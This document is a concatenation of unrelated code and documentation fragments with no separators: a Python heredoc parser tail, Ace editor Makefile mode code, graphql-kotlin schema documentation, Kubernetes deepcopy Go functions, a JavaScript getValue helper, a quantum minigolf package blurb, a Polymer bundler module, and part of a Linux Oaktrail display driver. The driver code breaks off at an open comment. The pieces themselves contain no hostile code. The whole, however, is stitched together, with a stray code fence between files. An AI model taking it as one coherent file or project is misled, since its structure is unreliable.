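        probe = line.lstrip("\t") if indented else line
        if probe == delimiter:
            return body, lines[i + 1:]
        body.append(line)
    return body, []        # unterminated heredoc: everything is body
```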
ace.define("ace/mode/makefile_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/sh_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var ShHighlightFile = require("./sh_highlight_rules");
var MakefileHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": ShHighlightFile.reservedKeywords,
"support.function.builtin": ShHighlightFile.languageConstructs,
"invalid.deprecated": "debugger"
}, "string");
this.$rules =
{
"start": [
{
token: "string.interpolated.backtick.makefile",
regex: "`",
next: "shell-start"
},
{
token: "punctuation.definition.comment.makefile",
regex: /#(?=.)/,
next: "comment"
},
{
token: [ "keyword.control.makefile"],
regex: "^(?:\\s*\\b)(\\-??include|ifeq|ifneq|ifdef|ifndef|else|endif|vpath|export|unexport|define|endef|override)(?:\\b)"
},
{// ^([^\t ]+(\s[^\t ]+)*:(?!\=))\s*.*
token: ["entity.name.function.makefile", "text"],
regex: "^([^\\t ]+(?:\\s[^\\t ]+)*:)(\\s*.*)"
}
],
"comment": [
{
token : "punctuation.definition.comment.makefile",
regex : /.+\\/
},
{
token : "punctuation.definition.comment.makefile",
regex : ".+",
next : "start"
}
],
"shell-start": [
{
token: keywordMapper,
regex : "[a-zA-Z_$][a-zA-Z0-9_$]*\\b"
},
{
token: "string",
regex : "\\w+"
},
{
token : "string.interpolated.backtick.makefile",
regex : "`",
next : "start"
}
]
};
};
oop.inherits(MakefileHighlightRules, TextHighlightRules);
exports.MakefileHighlightRules = MakefileHighlightRules;
});
ace.define("ace/mode/folding/coffee",["require","exports","module","ace/lib/oop","ace/mode/folding/fold_mode","ace/range"], function(require, exports, module) {
"use strict";
var oop = require("../../lib/oop");
var BaseFoldMode = require("./fold_mode").FoldMode;
var Range = require("../../range").Range;
var FoldMode = exports.FoldMode = function() {};
oop.inherits(FoldMode, BaseFoldMode);
(function() {
this.getFoldWidgetRange = function(session, foldStyle, row) {
var range = this.indentationBlock(session, row);
if (range)
return range;
var re = /\S/;
var line = session.getLine(row);
var startLevel = line.search(re);
if (startLevel == -1 || line[startLevel] != "#")
return;
var startColumn = line.length;
var maxRow = session.getLength();
var startRow = row;
var endRow = row;
while (++row < maxRow) {
line = session.getLine(row);
var level = line.search(re);
if (level == -1)
continue;
if (line[level] != "#")
break;
endRow = row;
}
if (endRow > startRow) {
var endColumn = session.getLine(endRow).length;
return new Range(startRow, startColumn, endRow, endColumn);
}
};
this.getFoldWidget = function(session, foldStyle, row) {
var line = session.getLine(row);
var indent = line.search(/\S/);
var next = session.getLine(row + 1);
var prev = session.getLine(row - 1);
var prevIndent = prev.search(/\S/);
var nextIndent = next.search(/\S/);
if (indent == -1) {
session.foldWidgets[row - 1] = prevIndent != -1 && prevIndent < nextIndent ? "start" : "";
return "";
}
if (prevIndent == -1) {
if (indent == nextIndent && line[indent] == "#" && next[indent] == "#") {
session.foldWidgets[row - 1] = "";
session.foldWidgets[row + 1] = "";
return "start";
}
} else if (prevIndent == indent && line[indent] == "#" && prev[indent] == "#") {
if (session.getLine(row - 2).search(/\S/) == -1) {
session.foldWidgets[row - 1] = "start";
session.foldWidgets[row + 1] = "";
return "";
}
}
if (prevIndent != -1 && prevIndent < indent)
session.foldWidgets[row - 1] = "start";
else
session.foldWidgets[row - 1] = "";
if (indent < nextIndent)
return "start";
else
return "";
};
}).call(FoldMode.prototype);
});
ace.define("ace/mode/makefile",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/makefile_highlight_rules","ace/mode/folding/coffee"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextMode = require("./text").Mode;
var MakefileHighlightRules = require("./makefile_highlight_rules").MakefileHighlightRules;
var FoldMode = require("./folding/coffee").FoldMode;
var Mode = function() {
this.HighlightRules = MakefileHighlightRules;
this.foldingRules = new FoldMode();
};
oop.inherits(Mode, TextMode);
(function() {
this.lineCommentStart = "#";
this.$indentWithTabs = true;
this.$id = "ace/mode/makefile";
}).call(Mode.prototype);
exports.Mode = Mode;
});
---
id: documenting-fields
title: Documenting Schema
---
Since Javadocs are not available at runtime for introspection, `graphql-kotlin-schema-generator` includes an annotation
class `@GraphQLDescription` that can be used to add schema descriptions to *any* GraphQL schema element. The string value can be in the Markdown format.
```kotlin
@GraphQLDescription("A useful widget")
data class Widget(
@GraphQLDescription("The widget's value that can be `null`")
val value: Int?
)
class WidgetQuery {
@GraphQLDescription("Creates new widget for given ID")
fun widgetById(@GraphQLDescription("The special ingredient") id: Int): Widget? = Widget(id)
}
```
The above query would produce the following GraphQL schema:
```graphql
schema {
query: Query
}
type Query {
"""Creates new widget for given ID"""
widgetById(
"""The special ingredient"""
id: Int!
): Widget
}
"""A useful widget"""
type Widget {
"""The widget's value that can be `null`"""
value: Int
}
```
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1beta1
import (
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in ExtraValue) DeepCopyInto(out *ExtraValue) {
{
in := &in
*out = make(ExtraValue, len(*in))
copy(*out, *in)
return
}
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExtraValue.
func (in ExtraValue) DeepCopy() ExtraValue {
if in == nil {
return nil
}
out := new(ExtraValue)
in.DeepCopyInto(out)
return *out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *LocalSubjectAccessReview) DeepCopyInto(out *LocalSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new LocalSubjectAccessReview.
func (in *LocalSubjectAccessReview) DeepCopy() *LocalSubjectAccessReview {
if in == nil {
return nil
}
out := new(LocalSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *LocalSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceAttributes) DeepCopyInto(out *NonResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceAttributes.
func (in *NonResourceAttributes) DeepCopy() *NonResourceAttributes {
if in == nil {
return nil
}
out := new(NonResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceRule) DeepCopyInto(out *NonResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.NonResourceURLs != nil {
in, out := &in.NonResourceURLs, &out.NonResourceURLs
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceRule.
func (in *NonResourceRule) DeepCopy() *NonResourceRule {
if in == nil {
return nil
}
out := new(NonResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceAttributes) DeepCopyInto(out *ResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceAttributes.
func (in *ResourceAttributes) DeepCopy() *ResourceAttributes {
if in == nil {
return nil
}
out := new(ResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceRule) DeepCopyInto(out *ResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.APIGroups != nil {
in, out := &in.APIGroups, &out.APIGroups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Resources != nil {
in, out := &in.Resources, &out.Resources
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.ResourceNames != nil {
in, out := &in.ResourceNames, &out.ResourceNames
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceRule.
func (in *ResourceRule) DeepCopy() *ResourceRule {
if in == nil {
return nil
}
out := new(ResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReview) DeepCopyInto(out *SelfSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReview.
func (in *SelfSubjectAccessReview) DeepCopy() *SelfSubjectAccessReview {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReviewSpec) DeepCopyInto(out *SelfSubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReviewSpec.
func (in *SelfSubjectAccessReviewSpec) DeepCopy() *SelfSubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectRulesReview) DeepCopyInto(out *SelfSubjectRulesReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
out.Spec = in.Spec
in.Status.DeepCopyInto(&out.Status)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectRulesReview.
func (in *SelfSubjectRulesReview) DeepCopy() *SelfSubjectRulesReview {
if in == nil {
return nil
}
out := new(SelfSubjectRulesReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectRulesReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectRulesReviewSpec) DeepCopyInto(out *SelfSubjectRulesReviewSpec) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectRulesReviewSpec.
func (in *SelfSubjectRulesReviewSpec) DeepCopy() *SelfSubjectRulesReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectRulesReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReview) DeepCopyInto(out *SubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReview.
func (in *SubjectAccessReview) DeepCopy() *SubjectAccessReview {
if in == nil {
return nil
}
out := new(SubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReviewSpec) DeepCopyInto(out *SubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
if in.Groups != nil {
in, out := &in.Groups, &out.Groups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Extra != nil {
in, out := &in.Extra, &out.Extra
*out = make(map[string]ExtraValue, len(*in))
for key, val := range *in {
var outVal []string
if val == nil {
(*out)[key] = nil
} else {
in, out := &val, &outVal
*out = make(ExtraValue, len(*in))
copy(*out, *in)
}
(*out)[key] = outVal
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReviewSpec.
func (in *SubjectAccessReviewSpec) DeepCopy() *SubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReviewStatus) DeepCopyInto(out *SubjectAccessReviewStatus) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReviewStatus.
func (in *SubjectAccessReviewStatus) DeepCopy() *SubjectAccessReviewStatus {
if in == nil {
return nil
}
out := new(SubjectAccessReviewStatus)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectRulesReviewStatus) DeepCopyInto(out *SubjectRulesReviewStatus) {
*out = *in
if in.ResourceRules != nil {
in, out := &in.ResourceRules, &out.ResourceRules
*out = make([]ResourceRule, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
if in.NonResourceRules != nil {
in, out := &in.NonResourceRules, &out.NonResourceRules
*out = make([]NonResourceRule, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectRulesReviewStatus.
func (in *SubjectRulesReviewStatus) DeepCopy() *SubjectRulesReviewStatus {
if in == nil {
return nil
}
out := new(SubjectRulesReviewStatus)
in.DeepCopyInto(out)
return out
}
/**
* Gets the value at `key` of `object`.
*
* @private
* @param {Object} [object] The object to query.
* @param {string} key The key of the property to get.
* @returns {*} Returns the property value.
*/
function getValue(object, key) {
return object == null ? undefined : object[key];
}
export default getValue;
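A quick usage sketch of the helper above (the function body is inlined here so the snippet runs standalone, without the module import), showing the null-safe behavior the doc comment describes:

```javascript
// Inlined copy of getValue for a self-contained demo.
function getValue(object, key) {
  return object == null ? undefined : object[key];
}

const user = { name: 'ada', roles: ['admin'] };

console.log(getValue(user, 'name'));  // 'ada'
console.log(getValue(user, 'age'));   // undefined (missing key)
console.log(getValue(null, 'name'));  // undefined (no TypeError on null)
```

Because the only guard is `object == null`, both `null` and `undefined` objects short-circuit to `undefined`; any other value is indexed directly.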
The game quantum minigolf is nearly the same as ordinary minigolf
- except that the ball obeys the laws of quantum mechanics.
Such a ball can be at several places at once. It can diffract around
obstacles and interfere with itself. Apart from that, the rules are
the same: you can play on various tracks involving various obstacles.
You hit the ball with a club and try to sink it into a hole on the
other side of the track.
WWW: http://quantumminigolf.sourceforge.net
/**
* @license
* Copyright (c) 2018 The Polymer Project Authors. All rights reserved.
* This code may only be used under the BSD style license found at
* http://polymer.github.io/LICENSE.txt
* The complete set of authors may be found at
* http://polymer.github.io/AUTHORS.txt
* The complete set of contributors may be found at
* http://polymer.github.io/CONTRIBUTORS.txt
* Code distributed by Google as part of the polymer project is also
* subject to an additional IP rights grant found at
* http://polymer.github.io/PATENTS.txt
*/
import generate from 'babel-generator';
import * as babel from 'babel-types';
import {ResolvedUrl} from 'polymer-analyzer';
import {assertIsJsDocument, getAnalysisDocument} from './analyzer-utils';
import {AssignedBundle, BundleManifest} from './bundle-manifest';
import {Bundler} from './bundler';
import {BundledJsDocument} from './document-collection';
import {getModuleExportNames, getOrSetBundleModuleExportName} from './es6-module-utils';
import {Es6Rewriter} from './es6-rewriter';
import {ensureLeadingDot, stripUrlFileSearchAndHash} from './url-utils';
/**
* Produces an ES6 Module BundledDocument.
*/
export async function bundle(
bundler: Bundler, manifest: BundleManifest, url: ResolvedUrl):
Promise<BundledJsDocument> {
const bundle = manifest.bundles.get(url);
if (!bundle) {
throw new Error(`No bundle found in manifest for url ${url}.`);
}
const assignedBundle = {url, bundle};
const generatedCode =
await prepareBundleModule(bundler, manifest, assignedBundle);
const es6Rewriter = new Es6Rewriter(bundler, manifest, assignedBundle);
const {code: rolledUpCode} = await es6Rewriter.rollup(url, generatedCode);
const document = assertIsJsDocument(
await bundler.analyzeContents(assignedBundle.url, rolledUpCode));
return {
language: 'js',
ast: document.parsedDocument.ast,
content: document.parsedDocument.contents,
files: [...assignedBundle.bundle.files]
};
}
/**
* Generate code containing import statements to all bundled modules and
* export statements to re-export their namespaces and exports.
*
* Example: a bundle containing files `module-a.js` and `module-b.js` would
* produce a prepareBundleModule result like:
*
* import * as $moduleA from './module-a.js';
* import * as $moduleB from './module-b.js';
* import $moduleBDefault from './module-b.js';
* export {thing1, thing2} from './module-a.js';
* export {thing3} from './module-b.js';
* export {$moduleA, $moduleB, $moduleBDefault};
*/
async function prepareBundleModule(
bundler: Bundler, manifest: BundleManifest, assignedBundle: AssignedBundle):
Promise<string> {
const bundleSource = babel.program([]);
const sourceAnalysis =
await bundler.analyzer.analyze([...assignedBundle.bundle.files]);
for (const resolvedSourceUrl of [...assignedBundle.bundle.files].sort()) {
const moduleDocument =
getAnalysisDocument(sourceAnalysis, resolvedSourceUrl);
const moduleExports = getModuleExportNames(moduleDocument);
const starExportName =
getOrSetBundleModuleExportName(assignedBundle, resolvedSourceUrl, '*');
bundleSource.body.push(babel.importDeclaration(
[babel.importNamespaceSpecifier(babel.identifier(starExportName))],
babel.stringLiteral(resolvedSourceUrl)));
if (moduleExports.size > 0) {
bundleSource.body.push(babel.exportNamedDeclaration(
undefined, [babel.exportSpecifier(
babel.identifier(starExportName),
babel.identifier(starExportName))]));
bundleSource.body.push(babel.exportNamedDeclaration(
undefined,
[...moduleExports].map(
(e) => babel.exportSpecifier(
babel.identifier(e),
babel.identifier(getOrSetBundleModuleExportName(
assignedBundle, resolvedSourceUrl, e)))),
babel.stringLiteral(resolvedSourceUrl)));
}
}
const {code} = generate(bundleSource);
return code;
}
// SPDX-License-Identifier: GPL-2.0-only
/*
* Copyright © 2009 Intel Corporation
*/
#include <linux/delay.h>
#include <linux/i2c.h>
#include <linux/pm_runtime.h>
#include <drm/drm_fourcc.h>
#include "framebuffer.h"
#include "gma_display.h"
#include "power.h"
#include "psb_drv.h"
#include "psb_intel_drv.h"
#include "psb_intel_reg.h"
#define MRST_LIMIT_LVDS_100L 0
#define MRST_LIMIT_LVDS_83 1
#define MRST_LIMIT_LVDS_100 2
#define MRST_LIMIT_SDVO 3
#define MRST_DOT_MIN 19750
#define MRST_DOT_MAX 120000
#define MRST_M_MIN_100L 20
#define MRST_M_MIN_100 10
#define MRST_M_MIN_83 12
#define MRST_M_MAX_100L 34
#define MRST_M_MAX_100 17
#define MRST_M_MAX_83 20
#define MRST_P1_MIN 2
#define MRST_P1_MAX_0 7
#define MRST_P1_MAX_1 8
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static const struct gma_limit_t mrst_limits[] = {
{ /* MRST_LIMIT_LVDS_100L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100L, .max = MRST_M_MAX_100L},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_83 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_83, .max = MRST_M_MAX_83},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_0},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_100 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100, .max = MRST_M_MAX_100},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_SDVO */
.vco = {.min = 1400000, .max = 2800000},
.n = {.min = 3, .max = 7},
.m = {.min = 80, .max = 137},
.p1 = {.min = 1, .max = 2},
.p2 = {.dot_limit = 200000, .p2_slow = 10, .p2_fast = 10},
.find_pll = mrst_sdvo_find_best_pll,
},
};
#define MRST_M_MIN 10
static const u32 oaktrail_m_converts[] = {
0x2B, 0x15, 0x2A, 0x35, 0x1A, 0x0D, 0x26, 0x33, 0x19, 0x2C,
0x36, 0x3B, 0x1D, 0x2E, 0x37, 0x1B, 0x2D, 0x16, 0x0B, 0x25,
0x12, 0x09, 0x24, 0x32, 0x39, 0x1c,
};
static const struct gma_limit_t *mrst_limit(struct drm_crtc *crtc,
int refclk)
{
const struct gma_limit_t *limit = NULL;
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)
|| gma_pipe_has_type(crtc, INTEL_OUTPUT_MIPI)) {
switch (dev_priv->core_freq) {
case 100:
limit = &mrst_limits[MRST_LIMIT_LVDS_100L];
break;
case 166:
limit = &mrst_limits[MRST_LIMIT_LVDS_83];
break;
case 200:
limit = &mrst_limits[MRST_LIMIT_LVDS_100];
break;
}
} else if (gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &mrst_limits[MRST_LIMIT_SDVO];
} else {
limit = NULL;
dev_err(dev->dev, "mrst_limit Wrong display type.\n");
}
return limit;
}
/** Derive the pixel clock for the given refclk and divisors for 8xx chips. */
static void mrst_lvds_clock(int refclk, struct gma_clock_t *clock)
{
clock->dot = (refclk * clock->m) / (14 * clock->p1);
}
static void mrst_print_pll(struct gma_clock_t *clock)
{
DRM_DEBUG_DRIVER("dotclock=%d, m=%d, m1=%d, m2=%d, n=%d, p1=%d, p2=%d\n",
clock->dot, clock->m, clock->m1, clock->m2, clock->n,
clock->p1, clock->p2);
}
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
u32 target_vco, actual_freq;
s32 freq_error, min_error = 100000;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.n = limit->n.min; clock.n <= limit->n.max;
clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
/* p2 value always stored in p2_slow on SDVO */
clock.p = clock.p1 * limit->p2.p2_slow;
target_vco = target * clock.p;
/* VCO will increase at this point so break */
if (target_vco > limit->vco.max)
break;
if (target_vco < limit->vco.min)
continue;
actual_freq = (refclk * clock.m) /
(clock.n * clock.p);
freq_error = 10000 -
((target * 10000) / actual_freq);
if (freq_error < -min_error) {
/* freq_error will start to decrease at
this point so break */
break;
}
if (freq_error < 0)
freq_error = -freq_error;
if (freq_error < min_error) {
min_error = freq_error;
*best_clock = clock;
}
}
}
if (min_error == 0)
break;
}
return min_error == 0;
}
/**
* Returns a set of divisors for the desired target clock with the given refclk,
* or FALSE. Divisor values are the actual hardware divisors.
*/
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
int err = target;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.p1 = limit->p1.min; clock.p1 <= limit->p1.max;
clock.p1++) {
int this_err;
mrst_lvds_clock(refclk, &clock);
this_err = abs(clock.dot - target);
if (this_err < err) {
*best_clock = clock;
err = this_err;
}
}
}
return err != target;
}
/**
* Sets the power management mode of the pipe and plane.
*
* This code should probably grow support for turning the cursor off and back
* on appropriately at the same time as we're turning the pipe off/on.
*/
static void oaktrail_crtc_dpms(struct drm_crtc *crtc, int mode)
{
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
u32 temp;
int i;
int need_aux = gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO) ? 1 : 0;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_HDMI)) {
oaktrail_crtc_hdmi_dpms(crtc, mode);
return;
}
if (!gma_power_begin(dev, true))
return;
/* XXX: When our outputs are all unaware of DPMS modes other than off
* and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
*/
switch (mode) {
case DRM_MODE_DPMS_ON:
case DRM_MODE_DPMS_STANDBY:
case DRM_MODE_DPMS_SUSPEND:
for (i = 0; i <= need_aux; i++) {
/* Enable the DPLL */
temp = REG_READ_WITH_AUX(map->dpll, i);
if ((temp & DPLL_VCO_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->dpll, temp, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->dpll,
temp | DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->dpll,
temp | DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
}
/* Enable the pipe */
temp = REG_READ_WITH_AUX(map->conf, i);
if ((temp & PIPEACONF_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->conf,
temp | PIPEACONF_ENABLE, i);
}
/* Enable the plane */
temp = REG_READ_WITH_AUX(map->cntr, i);
if ((temp & DISPLAY_PLANE_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->cntr,
temp | DISPLAY_PLANE_ENABLE,
i);
/* Flush the plane changes */
REG_WRITE_WITH_AUX(map->base,
REG_READ_WITH_AUX(map->base, i), i);
}
}
gma_crtc_load_lut(crtc);
/* Give the overlay scaler a chance to enable
if it's on this pipe */
/* psb_intel_crtc_dpms_video(crtc, true); TODO */
break;
case DRM_MODE_DPMS_OFF:
/* Give the overlay scaler a chance to disable
* if it's on this pipe */
/* psb_intel_crtc_dpms_video(crtc, FALSE); TODO */
for (i = 0; i <= need_aux; i++) {
/* Disable the VGA plane that we never use */
REG_WRITE_WITH_AUX(VGACNTRL, VGA_DISP_DISABLE, i);
/* Disable display plane */
temp = REG_READ_WITH_AUX(map->cntr, i);
if ((temp & DISPLAY_PLANE_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->cntr,
temp & ~DISPLAY_PLANE_ENABLE, i);
/* Flush the plane changes */
REG_WRITE_WITH_AUX(map->base,
REG_READ(map->base), i);
REG_READ_WITH_AUX(map->base, i);
}
/* Next, disable display pipes */
temp = REG_READ_WITH_AUX(map->conf, i);
if ((temp & PIPEACONF_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->conf,
temp & ~PIPEACONF_ENABLE, i);
REG_READ_WITH_AUX(map->conf, i);
}
/* Wait for the pipe disable to take effect. */
gma_wait_for_vblank(dev);
temp = REG_READ_WITH_AUX(map->dpll, i);
if ((temp & DPLL_VCO_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->dpll,
temp & ~DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
}
/* Wait for the clocks to turn off. */
udelay(150);
}
break;
}
/* Set FIFO Watermarks (values taken from EMGD) */
REG_WRITE(DSPARB, 0x3f80);
REG_WRITE(DSPFW1, 0x3f8f0404);
REG_WRITE(DSPFW2, 0x04040f04);
REG_WRITE(DSPFW3, 0x0);
REG_WRITE(DSPFW4, 0x04040404);
REG_WRITE(DSPFW5, 0x04040404);
REG_WRITE(DSPFW6, 0x78);
REG_WRITE(DSPCHICKENBIT, REG_READ(DSPCHICKENBIT) | 0xc040);
gma_power_end(dev);
}
/**
